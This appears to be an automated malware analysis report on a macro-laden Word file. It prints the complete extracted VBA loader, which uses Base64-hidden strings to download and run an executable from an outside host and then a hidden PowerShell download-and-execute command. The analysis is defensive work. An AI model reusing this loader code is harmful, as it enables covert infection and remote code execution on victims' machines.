Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 7013aa29f31e89c6…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 231.7 KB
Created: 2015-07-23 15:20:00 UTC
Authoring application: Microsoft Office Word 15.0000
First seen: 2015-09-30
MD5: aa6dcd1f5d6401f5596e279565df5b30
SHA-1: 30e1f8ff9f69f5eec2c9b1ee6af9f194bc9838b2
SHA-256: 7013aa29f31e89c6e9eda908258d245253340fa56ac29be15be2d7dab5ec3045
Risk score: 512

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1105 Ingress Tool Transfer
  • T1204.002 Malicious File
  • T1059.001 PowerShell

The sample is a malicious OOXML document containing VBA macros. An AutoOpen macro decodes Base64 string literals at run time to recover the download URL, the local file path, the WScript.Shell ProgID and a PowerShell command line, so that none of these indicators appears in plain text in the macro source. It uses Microsoft.XMLHTTP and ADODB.Stream to download http://www.yourpentesting.com/APT/CommandCam.exe and write it to disk, executes it with Shell, and then launches a hidden PowerShell command through WScript.Shell. The combination of an auto-exec entry point and Base64-obfuscated strings is characteristic of a loader whose purpose is to fetch and run a second-stage payload.

Heuristics (13)

  • VBA project inside OOXML (severity: medium, rule: OOXML_VBA, 9 related findings)
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA (severity: critical, rule: OLE_VBA_SHELL)
    Potential Shell call in VBA
    Matched line in script
    Call Shell(Base64DecodeString(strProgramName), vbHide)
  • WScript.Shell usage (severity: critical, rule: OLE_VBA_WSCRIPT)
    WScript.Shell usage
    Matched line in script
    'Set objShell = CreateObject("Wscript.shell")
  • PowerShell reference in VBA (severity: critical, rule: OLE_VBA_PS)
    PowerShell reference in VBA
    Matched line in script
    'https://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/
  • VBA Base64-decoded Shell command stager (severity: critical, rule: OLE_VBA_BASE64_SHELL_COMMAND_STAGER)
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
    Set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
  • VBA downloads and writes a file to disk (severity: critical, rule: OLE_VBA_HTTP_DROP_EXEC)
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        If fnSaveDownloadFile(strSaveAs, .responseBody) = False Then
  • Obfuscated auto-exec VBA loader (severity: critical, rule: OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
  • CreateObject call (severity: high, rule: OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
    Set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
  • VBA p-code auto-exec with execution tokens (severity: high, rule: OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (severity: low, rule: OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • External relationship (severity: high, rule: OOXML_EXTERNAL_REL)
    External target in word/_rels/settings.xml.rels: file:///C:\Users\micael.leal\Desktop\Guillaume.dotm
  • Suspicious extracted artifact (severity: info, rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://www.yourpentesting.com/APT/CommandCam.exe (referenced by macro)
    • http://www.source-code.biz/snippets/vbasic/12.htm (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (referenced by macro)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2012/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (referenced by macro)
    • http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (referenced by macro)
    • https://countuponsecurity.files.wordpress.com/2014/10/feodo-docmechanics.png (referenced by macro)
    • https://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/ (referenced by macro)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9320 bytes
SHA-256: 9539d6f3c2f6f38a1925884d48526bbaa42b67a1e5b4483f4afed812e0afa8a4
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 0, 0, MSForms, CommandButton"
Option Explicit
'Code of base64 encode and decode : http://www.source-code.biz/snippets/vbasic/12.htm
Private InitDone  As Boolean
Private Map1(0 To 63)  As Byte
Private Map2(0 To 127) As Byte
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
' Encodes a string into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
'   S         a String to be encoded.
' Returns:    a String with the Base64 encoded data.
Public Function Base64EncodeString(ByVal s As String) As String
   Base64EncodeString = Base64Encode(ConvertStringToBytes(s))
   End Function

' Encodes a byte array into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
'   InData    an array containing the data bytes to be encoded.
' Returns:    a string with the Base64 encoded data.
Public Function Base64Encode(InData() As Byte)
   Base64Encode = Base64Encode2(InData, UBound(InData) - LBound(InData) + 1)
   End Function

' Encodes a byte array into Base64 format.
' No blanks or line breaks are inserted.
' Parameters:
'   InData    an array containing the data bytes to be encoded.
'   InLen     number of bytes to process in InData.
' Returns:    a string with the Base64 encoded data.
Public Function Base64Encode2(InData() As Byte, ByVal InLen As Long) As String
   If Not InitDone Then Init
   If InLen = 0 Then Base64Encode2 = "": Exit Function
   Dim ODataLen As Long: ODataLen = (InLen * 4 + 2) \ 3     ' output length without padding
   Dim OLen As Long: OLen = ((InLen + 2) \ 3) * 4           ' output length including padding
   Dim Out() As Byte
   ReDim Out(0 To OLen - 1) As Byte
   Dim ip0 As Long: ip0 = LBound(InData)
   Dim ip As Long
   Dim op As Long
   Do While ip < InLen
      Dim i0 As Byte: i0 = InData(ip0 + ip): ip = ip + 1
      Dim i1 As Byte: If ip < InLen Then i1 = InData(ip0 + ip): ip = ip + 1 Else i1 = 0
      Dim i2 As Byte: If ip < InLen Then i2 = InData(ip0 + ip): ip = ip + 1 Else i2 = 0
      Dim o0 As Byte: o0 = i0 \ 4
      Dim o1 As Byte: o1 = ((i0 And 3) * &H10) Or (i1 \ &H10)
      Dim o2 As Byte: o2 = ((i1 And &HF) * 4) Or (i2 \ &H40)
      Dim o3 As Byte: o3 = i2 And &H3F
      Out(op) = Map1(o0): op = op + 1
      Out(op) = Map1(o1): op = op + 1
      Out(op) = IIf(op < ODataLen, Map1(o2), Asc("=")): op = op + 1
      Out(op) = IIf(op < ODataLen, Map1(o3), Asc("=")): op = op + 1
      Loop
   Base64Encode2 = ConvertBytesToString(Out)
   End Function

' Decodes a string from Base64 format.
' Parameters:
'    s        a Base64 String to be decoded.
' Returns     a String containing the decoded data.
Public Function Base64DecodeString(ByVal s As String) As String
   If s = "" Then Base64DecodeString = "": Exit Function
   Base64DecodeString = ConvertBytesToString(Base64Decode(s))
   End Function

' Decodes a byte array from Base64 format.
' Parameters
'   s         a Base64 String to be decoded.
' Returns:    an array containing the decoded data bytes.
Public Function Base64Decode(ByVal s As String) As Byte()
   If Not InitDone Then Init
   Dim IBuf() As Byte: IBuf = ConvertStringToBytes(s)
   Dim ILen As Long: ILen = UBound(IBuf) + 1
   If ILen Mod 4 <> 0 Then Err.Raise vbObjectError, , "Length of Base64 encoded input string is not a multiple of 4."
   Do While ILen > 0
      If IBuf(ILen - 1) <> Asc("=") Then Exit Do
      ILen = ILen - 1
      Loop
   Dim OLen As Long: OLen = (ILen * 3) \ 4
   Dim Out() As Byte
   ReDim Out(0 To OLen - 1) As Byte
   Dim ip As Long
   Dim op As Long
   Do While ip < ILen
      Dim i0 As Byte: i0 = IBuf(ip): ip = ip + 1
      Dim i1 As Byte: i1 = IBuf(ip): ip = ip + 1
      Dim i2 As Byte: If ip < ILen Then i2 = IBuf(ip): ip = ip + 1 Else i2 = Asc("A")
      Dim i3 As Byte: If ip < ILen Then i3 = IBuf(ip): ip = ip + 1 Else i3 = Asc("A")
      If i0 > 127 Or i1 > 127 Or i2 > 127 Or i3 > 127 Then _
         Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
      Dim b0 As Byte: b0 = Map2(i0)
      Dim b1 As Byte: b1 = Map2(i1)
      Dim b2 As Byte: b2 = Map2(i2)
      Dim b3 As Byte: b3 = Map2(i3)
      If b0 > 63 Or b1 > 63 Or b2 > 63 Or b3 > 63 Then _
         Err.Raise vbObjectError, , "Illegal character in Base64 encoded data."
      Dim o0 As Byte: o0 = (b0 * 4) Or (b1 \ &H10)
      Dim o1 As Byte: o1 = ((b1 And &HF) * &H10) Or (b2 \ 4)
      Dim o2 As Byte: o2 = ((b2 And 3) * &H40) Or b3
      Out(op) = o0: op = op + 1
      If op < OLen Then Out(op) = o1: op = op + 1
      If op < OLen Then Out(op) = o2: op = op + 1
      Loop
   Base64Decode = Out
   End Function

Private Sub Init()
   Dim c As Integer, i As Integer
   ' set Map1
   i = 0
   For c = Asc("A") To Asc("Z"): Map1(i) = c: i = i + 1: Next
   For c = Asc("a") To Asc("z"): Map1(i) = c: i = i + 1: Next
   For c = Asc("0") To Asc("9"): Map1(i) = c: i = i + 1: Next
   Map1(i) = Asc("+"): i = i + 1
   Map1(i) = Asc("/"): i = i + 1
   ' set Map2
   For i = 0 To 127: Map2(i) = 255: Next
   For i = 0 To 63: Map2(Map1(i)) = i: Next
   InitDone = True
   End Sub

Private Function ConvertStringToBytes(ByVal s As String) As Byte()
   Dim b1() As Byte: b1 = s
   Dim l As Long: l = (UBound(b1) + 1) \ 2
   If l = 0 Then ConvertStringToBytes = b1: Exit Function
   Dim b2() As Byte
   ReDim b2(0 To l - 1) As Byte
   Dim p As Long
   For p = 0 To l - 1
      Dim c As Long: c = b1(2 * p) + 256 * CLng(b1(2 * p + 1))
      If c >= 256 Then c = Asc("?")
      b2(p) = c
      Next
   ConvertStringToBytes = b2
   End Function

Private Function ConvertBytesToString(b() As Byte) As String
   Dim l As Long: l = UBound(b) - LBound(b) + 1
   Dim b2() As Byte
   ReDim b2(0 To (2 * l) - 1) As Byte
   Dim p0 As Long: p0 = LBound(b)
   Dim p As Long
   For p = 0 To l - 1: b2(2 * p) = b(p0 + p): Next
   Dim s As String: s = b2
   ConvertBytesToString = s
   End Function
Private Sub DownloadFile()
On Error GoTo errHere
 
Dim strQRY As String
 
Dim strHTTP As String
Dim strFileToSave As String
 
strHTTP = "aHR0cDovL3d3dy55b3VycGVudGVzdGluZy5jb20vQVBUL0NvbW1hbmRDYW0uZXhl"

MkDir "C:/test/"

strFileToSave = "QzovdGVzdC9Db21tYW5kQ2FtLmV4ZQ=="
 
If fnDownloadHTTP(Base64DecodeString(strHTTP), Base64DecodeString(strFileToSave)) = False Then      ' -- downlaod the file
    MsgBox "File DL failed. Make sure folder exist"
    GoTo ExitHere
End If
 
'MsgBox "Thumbs up :-)"
 
ExitHere:
    Exit Sub
errHere:
    Resume ExitHere
End Sub
 
Public Function fnDownloadHTTP(strTarget As String, strSaveAs As String, Optional strUN As String, Optional strPW As String) As Boolean
On Error GoTo errHere
 
Dim xmlHTTP As Object
Dim strRespText As String
fnDownloadHTTP = True
Set xmlHTTP = CreateObject("Microsoft.XMLHTTP")
With xmlHTTP
    .Open "GET", strTarget, False, strUN, strPW
    .setRequestHeader "cache-control", "no-cache,must revalidate"
    .Send
    If fnSaveDownloadFile(strSaveAs, .responseBody) = False Then
        GoTo errHere
    End If
End With
 
ExitHere:
    Set xmlHTTP = Nothing
    Exit Function
 
errHere:
    fnDownloadHTTP = False
    Resume ExitHere
End Function
 
Private Function fnSaveDownloadFile(strFilePath, bytArray) As Boolean
On Error GoTo errHere
 
 
Dim objStream  As Object 'New ADODB.Stream
fnSaveDownloadFile = True
Set objStream = CreateObject("ADODB.Stream")
With objStream
    .Type = 1 'adTypeBinary
    .Open
    .Write bytArray
    .SaveToFile strFilePath, 2 'adSaveCreateOverWrite
End With
 
ExitHere:
    Exit Function
errHere:
    fnSaveDownloadFile = False
    Resume ExitHere
End Function
Sub AutoOpen()
'https://countuponsecurity.files.wordpress.com/2014/10/feodo-docmechanics.png
'https://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/
'Set objFSO = CreateObject("Scripting.FileSystemObject")
'Set objShell = CreateObject("Wscript.shell")
'vbMaximizedFocus or vbHide

DownloadFile

Dim strProgramName As String
Dim strArgument As String

Sleep 5000

strProgramName = "QzovdGVzdC9Db21tYW5kQ2FtLmV4ZSAvZmlsZW5hbWUgQzovdGVzdC9teWNhbWVyYS5ibXA="

Call Shell(Base64DecodeString(strProgramName), vbHide)

Dim payload, wscript As String

' no hidden
'payload = "cG93ZXJzaGVsbC5leGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLW5vbG9nbyAtbm9wcm9maWxlIC1jIElFWCAoKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly93d3cueW91cnBlbnRlc3RpbmcuY29tL0FQVC9GSU5BTC5wczEnKSk="


'hidden powershell
payload = "cG93ZXJzaGVsbC5leGUgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLXdpbmRvd3N0eWxlIGhpZGRlbiAtbm9sb2dvIC1ub3Byb2ZpbGUgLWMgSUVYICgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovL3d3dy55b3VycGVudGVzdGluZy5jb20vQVBUL0ZJTkFMLnBzMScpKQ=="

wscript = "V1NjcmlwdC5TaGVsbA=="


CreateObject(Base64DecodeString(wscript)).Run ("" & Base64DecodeString(payload) & "")
 
Sleep 1000

End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 44544 bytes
SHA-256: d6771af6a0f3f8262fa710c3a9db01623136504a896b3c9f0638772d83e0c2c2
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).